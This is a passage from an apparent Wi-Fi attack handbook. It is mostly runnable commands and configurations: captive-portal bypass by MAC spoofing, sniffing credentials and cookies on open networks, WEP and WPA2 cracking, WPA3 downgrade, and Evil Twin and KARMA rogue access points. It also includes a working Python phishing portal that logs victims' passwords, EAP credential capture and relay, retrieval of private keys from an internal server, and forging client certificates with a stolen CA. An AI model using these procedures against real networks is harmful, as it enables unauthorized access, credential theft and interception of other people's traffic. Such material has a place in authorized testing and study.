sudo dhclient wlan2 -v
For hidden open networks:
cat > ~/wifi/configs/open_hidden.conf << 'EOF'
network={
ssid="HIDDEN_SSID"
key_mgmt=NONE
scan_ssid=1
}
EOF
sudo wpa_supplicant -Dnl80211 -iwlan2 -c ~/wifi/configs/open_hidden.conf -B
sudo dhclient wlan2 -v
6.3 Captive Portal Bypass via MAC Spoofing
Captive portals commonly whitelist clients by MAC address. If an already-authorized client is visible in the airodump-ng client list with active traffic, spoofing its MAC grants immediate portal bypass:
# Step 1: Identify an authorized client from the capture
sudo airodump-ng wlan0mon -c <CHANNEL> -w ~/wifi/captures/portal_recon
# Look in the STATION section for clients with #Data > 0
# Step 2: Stop NetworkManager, spoof the authorized MAC
sudo systemctl stop NetworkManager
sudo ip link set wlan2 down
sudo macchanger -m <AUTHORIZED_CLIENT_MAC> wlan2
sudo ip link set wlan2 up
# Step 3: Connect with the spoofed MAC
sudo wpa_supplicant -Dnl80211 -iwlan2 -c ~/wifi/configs/open.conf -B
sudo dhclient -v wlan2
# The captive portal now treats you as already-authorized
6.4 Credential Sniffing on Open Networks
# Capture all traffic on the open network channel
sudo airodump-ng wlan0mon -c <CHANNEL> -w ~/wifi/captures/opn_sniff
# Extract HTTP POST bodies (credentials, tokens)
tshark -r ~/wifi/captures/opn_sniff-01.cap \
-Y "http.request.method == POST" \
-T fields \
-e ip.src -e http.host -e http.request.uri -e http.file_data \
2>/dev/null
# Extract HTTP cookies
tshark -r ~/wifi/captures/opn_sniff-01.cap \
-Y "http.cookie" \
-T fields -e ip.src -e http.host -e http.cookie \
2>/dev/null
# DNS queries (reveals what clients are browsing)
tshark -r ~/wifi/captures/opn_sniff-01.cap \
-Y "dns.flags.response == 0" \
-T fields -e ip.src -e dns.qry.name \
2>/dev/null | sort -u
6.5 OWE Downgrade Attack
OWE networks often run in transition mode alongside a regular OPN SSID for backward compatibility. Since OWE provides no AP authentication, an Evil Twin with a higher signal is undetectable:
# An OWE AP in transition mode broadcasts two BSSIDs:
# 1. OPN SSID (e.g., "CafeWifi") ← unauthenticated, visible to all clients
# 2. OWE SSID (hidden, linked to OPN) ← encrypted, auto-negotiated
# Attack: create a stronger OPN AP with the same SSID
# Clients connecting in OPN mode will see your AP instead
# See Section 10 (Evil Twin) for the full rogue AP setup
7. WEP — Legacy Protocol
7.1 Theory
WEP uses RC4 stream cipher with a 24-bit Initialization Vector (IV) prepended to the key. Critical weaknesses:
- IVs are only 24 bits → after ~16 million packets, collisions are statistically guaranteed
- Weak IVs (certain IV patterns) directly leak key bytes — FMS/KoreK attack
- CRC-32 integrity check is linear → bit-flipping attacks without detection
- No replay protection
In practice, with ~50,000–100,000 captured IVs, the key is recoverable in seconds with aircrack-ng.
7.2 Automated Attack with besside-ng
# Kill interfering processes first
sudo airmon-ng check kill
# besside-ng handles everything: capture, replay, and crack
# -c: channel, -b: target BSSID
sudo besside-ng -c <CHANNEL> -b <AP_BSSID> wlan2 -v
# Results saved to:
# wep.cap → capture file
# wep.log → discovered keys
7.3 Manual Attack (Step by Step)
Step 1 — Capture IVs:
sudo airodump-ng \
-c <CHANNEL> \
--bssid <AP_BSSID> \
-w ~/wifi/captures/wep \
wlan0mon
Step 2 — Fake Authentication (required for injection):
# Associate to the AP without knowing the key
# -1: fake auth, 3600: re-auth period, -q 10: keepalive, -a: AP BSSID
sudo aireplay-ng -1 3600 -q 10 -a <AP_BSSID> wlan0mon
# Look for: "Association successful"
Step 3 — ARP Request Replay (accelerate IV generation):
# Capture a real ARP request and replay it rapidly to generate new IVs
# -b: AP BSSID, -h: our MAC (used in fake auth)
sudo aireplay-ng --arpreplay -b <AP_BSSID> -h <OUR_MAC> wlan0mon
Step 4 — Crack (run in parallel with capture):
# aircrack-ng attempts statistical key recovery
# Works from ~20,000 IVs, reliable at 50,000+
sudo aircrack-ng ~/wifi/captures/wep-01.cap
7.4 Connect to a WEP Network
cat > ~/wifi/configs/wep.conf << 'EOF'
network={
ssid="TARGET_SSID"
key_mgmt=NONE
wep_key0=AABBCCDDEEFF
wep_tx_keyidx=0
}
EOF
sudo wpa_supplicant -D nl80211 -i wlan2 -c ~/wifi/configs/wep.conf -B
sudo dhclient wlan2 -v
8. WPA2-PSK
8.1 Attack Surface Overview
WPA2-Personal offers two crackable artifacts:
- 4-Way Handshake — requires a client to associate; offline dictionary attack
- PMKID — present in EAPOL M1 from any AP; no client needed
Both succeed only if the passphrase is in your wordlist. AES-CCMP itself cannot be broken directly; what is attacked is the passphrase-to-PMK derivation (PBKDF2).
8.2 Capturing the 4-Way Handshake
Passive (wait for organic association):
sudo airodump-ng wlan0mon \
-c <CHANNEL> \
--bssid <AP_BSSID> \
-w ~/wifi/captures/psk_target
Active (force reconnection via deauthentication):
# Terminal 1: keep capturing
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <AP_BSSID> \
-w ~/wifi/captures/psk_target
# Terminal 2: deauth — client will reconnect and handshake is captured
# -0: deauth, 10: frame count (0=continuous), -a: AP, -c: specific client
sudo aireplay-ng -0 10 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon
# Deauth all clients (broadcast)
sudo aireplay-ng -0 10 -a <AP_BSSID> wlan0mon
Verify the handshake was captured:
aircrack-ng ~/wifi/captures/psk_target-01.cap
# Line in AP list should show: "1 handshake"
8.3 PMKID Attack (Clientless)
The PMKID is embedded in the first EAPOL frame sent by the AP during any association attempt. You do not need a client to be present.
# Method 1: hcxdumptool (most efficient — captures PMKID + handshakes simultaneously)
# hcxdumptool automatically sends association requests to trigger PMKID
sudo hcxdumptool \
-i wlan0mon \
--enable_status=3 \
-o ~/wifi/captures/pmkid.pcapng
# For targeted scan (filterfile contains one BSSID per line in lowercase, no colons)
echo "f09fc2711222" > ~/wifi/target_bssid.txt
sudo hcxdumptool \
-i wlan0mon \
--enable_status=3 \
--filterlist_ap=~/wifi/target_bssid.txt \
--filtermode=2 \
-o ~/wifi/captures/pmkid.pcapng
# Convert to hashcat mode 22000 (current standard — replaces deprecated 16800)
hcxpcapngtool \
~/wifi/captures/pmkid.pcapng \
-o ~/wifi/hashes/hash.hc22000
# Verify: each line starts with WPA*01* (PMKID) or WPA*02* (EAPOL) and is asterisk-separated
head -3 ~/wifi/hashes/hash.hc22000
# Format: WPA*TYPE*PMKID_or_MIC*AP_MAC*CLIENT_MAC*SSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
# (ANONCE, EAPOL and MESSAGEPAIR are empty on PMKID lines)
8.4 Converting Legacy Formats
# If you have an old .hccapx from hostapd-mana or older tools
# Step 1: hccapx → pcap
hcxhash2cap --hccapx=captured.hccapx -c ~/wifi/hashes/legacy.pcap
# Step 2: pcap → mode 22000
hcxpcapngtool ~/wifi/hashes/legacy.pcap -o ~/wifi/hashes/legacy.hc22000
8.5 Password Cracking with hashcat
# ── Dictionary attack ──────────────────────────────────────────────
hashcat -a 0 -m 22000 ~/wifi/hashes/hash.hc22000 \
/usr/share/wordlists/rockyou.txt
# ── Dictionary + rules (best64 covers common transformations) ──────
hashcat -a 0 -m 22000 ~/wifi/hashes/hash.hc22000 \
/usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# ── Combinator (two wordlists joined) ─────────────────────────────
hashcat -a 1 -m 22000 ~/wifi/hashes/hash.hc22000 \
wordlist1.txt wordlist2.txt
# ── Hybrid: wordlist + mask suffix (e.g. word + 4 digits) ─────────
hashcat -a 6 -m 22000 ~/wifi/hashes/hash.hc22000 \
/usr/share/wordlists/rockyou.txt "?d?d?d?d"
# ── Pure brute-force (8-char, lower + digits) ─────────────────────
hashcat -a 3 -m 22000 ~/wifi/hashes/hash.hc22000 \
-1 ?l?d "?1?1?1?1?1?1?1?1"
# ── Benchmark your GPU speed ──────────────────────────────────────
hashcat -b -m 22000
Mode quick reference:
22000 → WPA-PBKDF2-PMKID+EAPOL (current, unified) ← USE THIS
22001 → WPA-PMK-PMKID+EAPOL (if PMK is known)
2500 → WPA-EAPOL-PBKDF2 (deprecated, still works)
16800 → WPA-PMKID-PBKDF2 (deprecated, use 22000)
8.6 Rogue AP for Offline Networks (hostapd-mana)
If a network is not broadcasting (client only searches via Probe Requests), set up a Rogue AP with the same SSID to capture the handshake:
cat > ~/wifi/configs/rogue_psk.conf << 'EOF'
interface=wlan1
driver=nl80211
hw_mode=g
channel=6
ssid=TARGET_HIDDEN_SSID
mana_wpaout=/root/wifi/hashes/mana_captured.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=00000000
EOF
sudo hostapd-mana ~/wifi/configs/rogue_psk.conf
# Wait for: AP-STA-POSSIBLE-PSK-MISMATCH → client connected, hash captured → CTRL+C
# Convert and crack
hcxhash2cap --hccapx=~/wifi/hashes/mana_captured.hccapx \
-c ~/wifi/hashes/mana.pcap
hcxpcapngtool ~/wifi/hashes/mana.pcap -o ~/wifi/hashes/mana.hc22000
hashcat -a 0 -m 22000 ~/wifi/hashes/mana.hc22000 /usr/share/wordlists/rockyou.txt
8.7 Traffic Decryption
# Decrypt entire capture once password is known
airdecap-ng \
-e "TARGET_SSID" \
-p "recovered_password" \
~/wifi/captures/psk_target-01.cap
# Output: psk_target-01-dec.cap
# Analyze decrypted traffic
wireshark ~/wifi/captures/psk_target-01-dec.cap
# Extract HTTP hosts visited
tshark -r ~/wifi/captures/psk_target-01-dec.cap \
-Y "http.host" \
-T fields -e ip.src -e http.host -e http.request.uri 2>/dev/null
8.8 Connect with Known Password
cat > ~/wifi/configs/psk.conf << 'EOF'
network={
ssid="TARGET_SSID"
psk="recovered_password"
key_mgmt=WPA-PSK
proto=WPA2
scan_ssid=1
}
EOF
sudo wpa_supplicant -Dnl80211 -iwlan3 -c ~/wifi/configs/psk.conf -B
sudo dhclient wlan3 -v
9. WPA3-SAE & Dragonblood
9.1 Theory
WPA3-SAE eliminates offline dictionary attacks by requiring real-time interaction with the AP for each password guess. This makes cracking computationally equivalent to guessing in real time.
Current known vulnerabilities:
| Vulnerability | Status (2024) | Exploitable? |
|---|---|---|
| Dragonblood side-channel (timing/cache) | Patched in IEEE 802.11-2020 + most vendors | No on patched hardware |
| Transition mode downgrade | Still relevant if AP supports WPA2+WPA3 | Yes, if 802.11w not enforced |
| Online brute-force | Always present (rate-limited by AP) | Slow but possible |
| PMKID extraction SAE | Not applicable — SAE doesn’t expose PMKID the same way | No |
9.2 Online Brute-Force with wacker
# 2.4 GHz channel → frequency mapping
# Ch 1=2412, Ch 6=2437, Ch 11=2462
cd ~/tools/wacker
./wacker.py \
--wordlist /usr/share/wordlists/rockyou.txt \
--ssid "TARGET_WPA3_SSID" \
--bssid <AP_BSSID> \
--interface wlan2 \
--freq 2462
# Expected rate: ~1-3 attempts/second (limited by SAE commit-confirm round trips)
# Only practical for common/short passwords
9.3 WPA3 Transition Mode Downgrade
APs running in transition mode (supporting both WPA2 and WPA3 simultaneously) are vulnerable to a downgrade attack: force the client onto WPA2 by presenting a Rogue AP that only advertises WPA2.
# Step 1: Confirm transition mode (airodump-ng or cipher analysis in Section 5)
# Look for "PSK SAE" in the ENC/AUTH columns, or AKM suite listing both 00-0f-ac-2 and 00-0f-ac-8
# Step 2: Check if 802.11w is mandatory
# If MFP Required = 1 → deauth attacks will fail → downgrade harder to execute
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.bssid == <BSSID> && wlan.fc.type_subtype == 8" \
-T fields -e wlan.rsn.capabilities.mfpr 2>/dev/null
# 0 = MFP optional → deauth works
# 1 = MFP mandatory → deauth fails (clients ignore unauthenticated deauth)
# Step 3: Create WPA2-only Rogue AP
cat > ~/wifi/configs/downgrade.conf << 'EOF'
interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=TARGET_WPA3_SSID
mana_wpaout=/root/wifi/hashes/downgrade.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=00000000
EOF
sudo hostapd-mana ~/wifi/configs/downgrade.conf
# Step 4: Deauth client if MFP is not mandatory
sudo iwconfig wlan0mon channel 11
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID> -c <CLIENT_MAC> wlan0mon
# Step 5: Crack as WPA2
hcxhash2cap --hccapx=~/wifi/hashes/downgrade.hccapx -c ~/wifi/hashes/dg.pcap
hcxpcapngtool ~/wifi/hashes/dg.pcap -o ~/wifi/hashes/dg.hc22000
hashcat -a 0 -m 22000 ~/wifi/hashes/dg.hc22000 /usr/share/wordlists/rockyou.txt
10. Evil Twin & Evil Portal Attacks
10.1 Theory and Attack Models
An Evil Twin is a rogue AP that impersonates a legitimate one — same SSID, potentially same BSSID, stronger signal. Once the client connects to the rogue AP, different objectives can be achieved:
| Variant | Goal | Inner mechanism |
|---|---|---|
| Evil Twin (OPN) | MITM, traffic intercept | Client joins open fake AP |
| Evil Portal | Credential phishing | Captive portal with fake login page |
| WPA2 Evil Twin | Handshake capture | Client attempts PSK auth against fake AP |
| Enterprise Evil Twin | MSCHAPv2 / EAP credential capture | Client authenticates via EAP to attacker RADIUS |
| KARMA Attack | Target clients probing for any network | AP responds to all Probe Requests |
Deauthentication is the standard mechanism to force clients off the legitimate AP and onto the Evil Twin. It is blocked by 802.11w (MFP) when mandatory.
10.2 KARMA Attack
KARMA exploits the fact that clients actively broadcast Probe Requests for previously known networks. By responding to every probe with a matching SSID, the attacker becomes a universal AP:
hostapd-mana implements KARMA automatically. Enable it with mana_loud=1:
cat > ~/wifi/configs/karma.conf << 'EOF'
interface=wlan1
driver=nl80211
hw_mode=g
channel=6
ssid=default
# KARMA: respond to every probe request with a matching SSID
mana_loud=1
# Log connected clients
mana_credout=/root/wifi/logs/karma_clients.log
# Open network — clients connect without credentials
wpa=0
EOF
sudo hostapd-mana ~/wifi/configs/karma.conf
sudo ip addr add 192.168.99.1/24 dev wlan1 # the AP side needs a static address; serve DHCP with dnsmasq as in Section 10.5 (dhclient is for clients, not the AP)
wifiphisher enables KARMA by default in its “Known Beacons” attack:
sudo wifiphisher --nojamming -aI wlan1
# Select "Known Beacons" scenario when prompted
10.3 Evil Twin — Automated with wifiphisher
wifiphisher automates the full Evil Twin attack chain: creates the rogue AP, runs continuous deauth jamming, and serves a customizable phishing page:
# Full attack with automatic AP selection and firmware-upgrade phishing page
sudo wifiphisher
# Specify target and interface manually
sudo wifiphisher \
-aI wlan1 \
-jI wlan0 \
-e "TARGET_SSID" \
-p firmware-upgrade \
--handshake-capture ~/wifi/captures/psk_target-01.cap
# Available built-in scenarios:
# firmware-upgrade → fake firmware update page (requests WPA password)
# oauth-login → fake social login page
# wifi_connect → fake "reconnect to wifi" page
# browser-plugin-update → fake browser plugin update
# plugin_update → generic software update
# Custom phishing page
sudo wifiphisher \
-aI wlan1 \
-jI wlan0 \
-e "TARGET_SSID" \
-p /path/to/custom/phishing/scenario/
How wifiphisher works:
- Scans for target AP
- Creates Evil Twin with same SSID (optionally same BSSID)
- Continuously sends deauthentication frames from wlan0 (jamming interface)
- Victim’s device reconnects to the stronger/only visible AP (the Evil Twin)
- Victim is served the phishing page when they attempt to browse
- Credentials are captured and displayed in the terminal
10.4 Evil Portal — Automated with fluxion
fluxion captures the WPA2 handshake first, then uses it to verify credentials entered in the captive portal (only accepts the correct password):
cd ~/tools/fluxion
sudo bash fluxion.sh
# Interactive menu:
# 1. Select attack: "Handshake Snooper" (captures handshake first)
# 2. Select target AP from the scan list
# 3. Capture handshake (waits for or forces reconnection)
# 4. Switch to "Captive Portal" attack
# 5. Select portal template (or use custom)
# 6. fluxion launches:
# - Rogue AP on wlan1
# - Deauth jamming from wlan0
# - DHCP + DNS server pointing all traffic to the portal
# - Web server serving the phishing page
# 7. When victim enters the correct password:
# fluxion verifies it against the captured handshake
# → Only the real password is accepted and displayed
10.5 Manual Evil Portal Setup
For full control and custom scenarios:
# ─── Step 1: Set up the Rogue AP ──────────────────────────────────────────
cat > ~/wifi/configs/evil_portal_ap.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=TARGET_SSID
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0
EOF
sudo hostapd ~/wifi/configs/evil_portal_ap.conf &
# ─── Step 2: Configure IP and DHCP ───────────────────────────────────────
sudo ip addr add 192.168.99.1/24 dev wlan1
sudo ip link set wlan1 up
cat > /tmp/dnsmasq_portal.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.99.10,192.168.99.100,12h
dhcp-option=3,192.168.99.1
dhcp-option=6,192.168.99.1
server=8.8.8.8
log-queries
log-dhcp
# Redirect all DNS to our portal
address=/#/192.168.99.1
EOF
sudo dnsmasq -C /tmp/dnsmasq_portal.conf
# ─── Step 3: NAT / iptables for traffic routing ───────────────────────────
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
# Redirect HTTP to our portal
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 \
-j DNAT --to-destination 192.168.99.1:80
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 \
-j DNAT --to-destination 192.168.99.1:80
# ─── Step 4: Serve the phishing page (Python example) ────────────────────
# Place your portal HTML in /tmp/portal/
mkdir -p /tmp/portal
cat > /tmp/portal/index.html << 'HTMLEOF'
<!DOCTYPE html>
<html>
<head><title>Network Login Required</title></head>
<body>
<h2>Please re-enter your Wi-Fi password to continue</h2>
<form method="POST" action="/capture">
Password: <input type="password" name="pwd">
<input type="submit" value="Connect">
</form>
</body>
</html>
HTMLEOF
# Simple capture server with Python
python3 -c "
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Every path gets the portal page (DNS and iptables already point here)
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        with open('/tmp/portal/index.html', 'rb') as f:
            self.wfile.write(f.read())

    def do_POST(self):
        length = int(self.headers['Content-Length'])
        data = parse_qs(self.rfile.read(length).decode())
        pwd = data.get('pwd', [''])[0]
        print(f'[+] CAPTURED PASSWORD: {pwd}')
        with open('/root/wifi/logs/portal_creds.txt', 'a') as f:
            f.write(pwd + '\n')
        self.send_response(302)
        self.send_header('Location', 'http://google.com')
        self.end_headers()

    def log_message(self, *a):
        pass

HTTPServer(('0.0.0.0', 80), Handler).serve_forever()
" &
# ─── Step 5: Deauth clients from the legitimate AP ────────────────────────
sudo iwconfig wlan0mon channel 6
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID> wlan0mon
10.6 eaphammer for Enterprise Evil Portal
cd ~/tools/eaphammer
# Captive portal phishing (for clients probing open networks)
sudo killall dnsmasq 2>/dev/null
python3 ./eaphammer \
--essid "Airport_WiFi" \
--interface wlan4 \
--captive-portal
# In parallel: deauth from the client's real AP
sudo iwconfig wlan0mon channel <CHANNEL>
sudo aireplay-ng -0 0 wlan0mon \
-a <REAL_AP_BSSID> \
-c <TARGET_CLIENT_MAC>
# Hostile portal (forces NTLM auth from Windows/macOS clients automatically)
python3 ./eaphammer \
--essid "Coffee_Shop_WiFi" \
--interface wlan2 \
--hostile-portal
# Extract NTLMv2 hashes from Responder logs
cat ~/tools/eaphammer/logs/Responder-Session.log | \
grep "NTLMv2" | awk '{print $NF}' > ~/wifi/hashes/ntlm.hc5600
hashcat -a 0 -m 5600 ~/wifi/hashes/ntlm.hc5600 \
/usr/share/wordlists/rockyou.txt
11. WPA2/3-Enterprise (MGT) — Reconnaissance
11.1 Goals
Enterprise recon collects intelligence that directly enables or improves attacks:
- EAP identities in cleartext → usernames and AD domain before the TLS tunnel opens
- Server TLS certificate → domain info, CA name, email, hostname
- Supported EAP methods → determine which attack path is available
- MFP status → determines whether deauth is possible
- Client behavior → which clients verify certs (immune to basic Rogue AP)
11.2 Capturing EAP Identities in Cleartext
In PEAP and EAP-TTLS, the EAP Identity Response (sent before the TLS tunnel) contains the username in plaintext. This is a design feature, not a bug — but it leaks domain information:
# Capture on the enterprise AP channel
sudo airodump-ng wlan0mon -c <CHANNEL> --wps \
-w ~/wifi/captures/ent_recon
# Method 1: tshark real-time extraction
tshark -r ~/wifi/captures/ent_recon-01.cap \
-Y "(eap && wlan.ra == <AP_BSSID>) && (eap.identity)" \
-T fields \
-e wlan.sa \
-e eap.identity \
2>/dev/null
# Method 2: Wireshark filter
# eap && eap.code == 2
# Then look for Type: Identity packets
# Method 3: wifi_db
python3 ~/tools/wifi_db/wifi_db.py \
-d ~/wifi/enterprise.sqlite ~/wifi/captures/
sqlite3 ~/wifi/enterprise.sqlite \
"SELECT DISTINCT Identity, Station FROM Identities;"
Typical output:
64:32:a8:ba:6c:41 CONTOSO\juan.garcia
64:32:a8:07:6c:40 anonymous ← identity hiding enabled (EAP-TTLS well-configured)
11.3 Extracting the Server TLS Certificate
The RADIUS server’s certificate is transmitted in cleartext — any passive observer can read it. This reveals the internal PKI:
# Full certificate details
tshark -r ~/wifi/captures/ent_recon-01.cap \
-Y "wlan.bssid == <AP_BSSID> && ssl.handshake.type == 11" \
-V 2>/dev/null | \
grep -E -A1 "rdnSequence|commonName|organizationName|emailAddress|dNSName|serialNumber"
# Concise: only string fields (CN, O, email, SAN)
tshark -r ~/wifi/captures/ent_recon-01.cap \
-Y "wlan.bssid == <AP_BSSID> && x509sat.IA5String" \
-T fields -e x509sat.IA5String 2>/dev/null | sort -u
# Wireshark filter
# (wlan.sa == <AP_BSSID>) && (tls.handshake.certificate)
What to extract and why:
- Subject CN → RADIUS server hostname → for cloning the cert (matching CN)
- Issuer CN → CA name → for building a trusted fake cert
- emailAddress → contact for the admin, potential username format
- O/OU → organization/department name → AD domain clues
- SAN dNSName → internal hostnames → network topology
11.4 EAP Method Enumeration with EAP_buster
cd ~/tools/EAP_buster
# Enumerate every EAP type supported by the AP
# This tells you: does the AP support EAP-TLS only? PEAP? EAP-TTLS? LEAP?
bash ./EAP_buster.sh "ENTERPRISE_SSID" "DOMAIN\username" wlan1
# Example output:
# [+] Checking EAP-MD5 ... REJECTED
# [+] Checking EAP-GTC ... REJECTED
# [+] Checking LEAP ... REJECTED
# [+] Checking EAP-TLS ... ACCEPTED ← requires client certificate
# [+] Checking PEAP ... ACCEPTED ← MSCHAPv2 inside TLS tunnel
# [+] Checking EAP-TTLS ... ACCEPTED
# [+] Checking EAP-TTLS/PAP ... ACCEPTED ← cleartext password inside tunnel!
Impact:
- Only EAP-TLS → must steal or forge a client certificate
- PEAP accepted → Rogue AP attack to get MSCHAPv2 hash
- EAP-TTLS/PAP accepted → Rogue AP captures cleartext password
- LEAP accepted → trivially crackable
12. WPA2/3-Enterprise (MGT) — Attacks
12.1 Rogue AP to Capture MSCHAPv2 Credentials
Clients that do not verify the RADIUS server certificate will authenticate against any AP with the matching SSID. The attacker’s RADIUS server captures the MSCHAPv2 challenge-response pair:
# Step 1: Create a certificate matching the real server's fields (from recon)
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard
# Enter: country, state, city, organization, CN ← use exact values from real cert
# Step 2: Launch the Rogue AP
python3 ./eaphammer \
-i wlan3 \
--auth wpa-eap \
--essid "ENTERPRISE_SSID" \
--creds \
--negotiate balanced
# --negotiate balanced: try multiple EAP methods in order
# Step 3: Deauth target client(s) from the real AP(s)
# If there are two APs on the same SSID, deauth from both simultaneously
sudo iwconfig wlan0mon channel <CHANNEL>
sudo aireplay-ng -0 0 -a <REAL_AP_1_BSSID> -c <CLIENT_MAC> wlan0mon
# Second interface for the second AP (if needed)
sudo airmon-ng start wlan1
sudo iwconfig wlan1mon channel <CHANNEL>
sudo aireplay-ng -0 0 -a <REAL_AP_2_BSSID> -c <CLIENT_MAC> wlan1mon
# Step 4: Wait for connection
# eaphammer output:
# [*] Sending EAP-TLS Start...
# [!] Alert: unknown ca ← client verifies certs, NOT vulnerable to this method
# [*] Captured credentials for DOMAIN\user: hash...
# Step 5: Crack MSCHAPv2 hash
grep -i "hashcat" ~/tools/eaphammer/logs/hostapd-eaphammer.log | \
awk '{print $3}' > ~/wifi/hashes/mschapv2.hc5500
hashcat -a 0 -m 5500 ~/wifi/hashes/mschapv2.hc5500 \
/usr/share/wordlists/rockyou.txt
12.2 Online Credential Brute-Force with air-hammer
When a username is known (from the EAP identity phase), attempt dictionary-based authentication directly against the AP:
cd ~/tools/air-hammer
# Single user dictionary attack
echo 'CONTOSO\juan.garcia' > ~/wifi/target_user.txt
./air-hammer.py \
-i wlan3 \
-e "ENTERPRISE_SSID" \
-P /usr/share/wordlists/rockyou.txt \
-u ~/wifi/target_user.txt
# Password spray: known password, multiple users
# Build user list with domain prefix
awk '{print "CONTOSO\\" $1}' \
/usr/share/seclists/Usernames/top-usernames-shortlist.txt \
> ~/wifi/users_contoso.txt
./air-hammer.py \
-i wlan4 \
-e "ENTERPRISE_SSID" \
-p "Summer2024!" \
-u ~/wifi/users_contoso.txt
12.3 MSCHAPv2 Relay with wpa_sycophant
MSCHAPv2 uses a challenge-response model. An attacker can relay the challenge from the real RADIUS server to the real client and relay the client’s response back — authenticating as the victim without knowing the password. This is an MITM relay, not a crack:
# Step 1: Set a controlled MAC for the Rogue AP
sudo systemctl stop NetworkManager
sudo airmon-ng stop wlan1mon
sudo ip link set wlan1 down
sudo macchanger -m F0:9F:C2:00:AA:01 wlan1
sudo ip link set wlan1 up
# Step 2: Configure wpa_sycophant (acts as the real client toward the real RADIUS)
cat > ~/tools/wpa_sycophant/sycophant.conf << 'EOF'
network={
ssid="ENTERPRISE_SSID"
scan_ssid=1
key_mgmt=WPA-EAP
identity=""
anonymous_identity=""
password=""
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
bssid_blacklist=F0:9F:C2:00:AA:01
}
EOF
# Step 3: Raise the Rogue AP linked to wpa_sycophant (Shell 1)
cd ~/tools/berate_ap
./berate_ap \
--eap \
--mana-wpe \
--wpa-sycophant \
--mana-credout ~/wifi/logs/relay_creds.log \
wlan1 lo "ENTERPRISE_SSID"
# Step 4: Deauth a vulnerable client (Shell 2)
sudo airmon-ng start wlan0
sudo iwconfig wlan0mon channel <CHANNEL>
sudo aireplay-ng -0 0 wlan0mon \
-a <REAL_AP_BSSID> \
-c <VULNERABLE_CLIENT_MAC>
# Step 5: Start relay (Shell 3)
cd ~/tools/wpa_sycophant
./wpa_sycophant.sh -c sycophant.conf -i wlan3
# When the victim connects to berate_ap, sycophant authenticates to the real RADIUS
# using the victim's identity and relayed challenge-response
# Step 6: Get an IP (Shell 4)
sudo dhclient wlan3 -v
# Troubleshooting: if relay fails, try alternate phase1
# Edit sycophant.conf: phase1="peapver=1"
13. Advanced Enterprise Attacks
13.1 Rogue AP with the Stolen Real Certificate
When access to the internal network has been established (via relay or other means), the RADIUS CA certificate and server certificate may be exfiltrated. With the real certificate, even clients that enforce certificate validation will connect:
# Step 1: Retrieve certificates from the internal web server
wget -r -A "*.crt,*.pem,*.key,*.cer" http://192.168.X.1/pki/
# Step 2: Import into eaphammer
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard import \
--server-cert /path/to/server.crt \
--ca-cert /path/to/ca.crt \
--private-key /path/to/server.key \
--private-key-passwd <key_passphrase>
# Step 3: Launch Rogue AP with real certificate
python3 ./eaphammer \
-i wlan4 \
--auth wpa-eap \
--essid "ENTERPRISE_SSID" \
--creds \
--negotiate balanced
# Step 4: Deauth target clients from both real APs
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID_1> -c <CLIENT_MAC> wlan0mon
# Clients that previously rejected fake cert will now connect
Alternative: berate_ap with real certificate:
# Convert to PEM format if needed
openssl x509 -in ca.crt -out ~/wifi/certs/hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out ~/wifi/certs/hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out ~/wifi/certs/hostapd.key.pem
openssl dhparam -out ~/wifi/certs/hostapd.dh.pem 2048
cd ~/tools/berate_ap
./berate_ap \
--eap \
--mana-wpe \
--wpa-sycophant \
--mana-credout ~/wifi/logs/real_cert_creds.log \
wlan4 lo "ENTERPRISE_SSID" \
--eap-cert-path ~/wifi/certs/
13.2 Forging a Client Certificate (EAP-TLS)
If the AP only accepts EAP-TLS (certificate-based authentication), and you have obtained the CA key, you can generate a valid client certificate:
cd ~/wifi/certs/
# Generate client private key
openssl genrsa -out client.key 2048
# Create CSR — use domain user format in CN
cat > client.conf << 'EOF'
[req]
default_bits = 2048
prompt = no
distinguished_name = dn
[dn]
C = US
ST = State
L = City
O = CONTOSO
CN = CONTOSO\GlobalAdmin
emailAddress = admin@contoso.local
EOF
openssl req -config client.conf -new -key client.key -out client.csr
# Sign with the stolen CA (-CAcreateserial creates the serial file, since none was obtained with the CA)
openssl x509 -days 730 \
-CA ca.crt \
-CAkey ca.key \
-CAcreateserial \
-in client.csr \
-req \
-out client.crt
# Connect using EAP-TLS
cat > ~/wifi/configs/eap_tls.conf << 'EOF'
network={
ssid="ENTERPRISE_SSID"
scan_ssid=1
proto=RSN
key_mgmt=WPA-EAP
auth_alg=OPEN
eap=TLS
identity="CONTOSO\GlobalAdmin"
ca_cert="/root/wifi/certs/ca.crt"
client_cert="/root/wifi/certs/client.crt"
private_key="/root/wifi/certs/client.key"
# private_key_passwd="keypassword" (only needed if client.key is encrypted; genrsa above created it unencrypted)
}
EOF
sudo wpa_supplicant -Dnl80211 -i wlan4 -c ~/wifi/configs/eap_tls.conf -B
sudo dhclient wlan4 -v
14. Post-Exploitation
14.1 Internal Network Discovery
# Identify your IP, gateway, and subnet
ip addr show wlan3
ip route
# Discover live hosts on the local segment
sudo arp-scan -I wlan3 -l
# Verify client isolation
